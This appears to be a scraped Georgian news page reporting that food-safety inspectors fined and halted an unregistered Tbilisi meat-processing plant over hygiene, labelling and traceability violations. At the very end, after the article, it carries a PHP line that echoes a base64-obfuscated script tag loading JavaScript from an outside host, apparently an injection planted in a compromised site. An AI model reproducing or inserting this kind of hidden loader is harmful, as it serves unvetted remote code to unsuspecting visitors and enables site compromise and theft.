celsiusi
ავერსი შნაიდერი
სურსათის ეროვნული სააგენტოს თბილისის საქალაქო სამსახურის ინსპექტირების ჯგუფებმა, მიღებული შეტყობინების საფუძველზე, თბილისში, ჟღენტის 2 ნომერში მდებარე ხორცის გადამამუშავებელი საწარმო შეამოწმეს, რომელიც საქმიანობას ახორციელებდა სურსათის ეროვნული სააგენტოს გვერდის ავლით, კანონმდებლობით დადგენილი აღიარების მინიჭების გარეშე.
 
სურსათის ეროვნული სააგენტოს ინფორმაციით, საწარმოში გამოვლინდა კრიტიკული შეუსაბამობები, მათ შორის, სანიტარიულ-ჰიგიენური ნორმების, სურსათის წარმოების ტექნოლოგიური პროცესის, ეტიკეტირებისა და მიკვლევადობის წესის დარღვევები.
 
გარდა ამისა, ბიზნესოპერატორი საქმიანობდა ეკონომიკურ საქმიანობათა რეესტრში რეგისტრაციის გარეშე (65-ე მუხლის 1-ლი ნაწილი).
 
სააგენტოს უფლებამოსილმა პირებმა, გამოვლენილი დარღვევების შესაბამისად, გაატარეს კანონით დადგენილი ღონისძიებები - ბიზნესოპერატორი დაჯარიმდა და შეუჩერდა საწარმოო პროცესი.
883
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");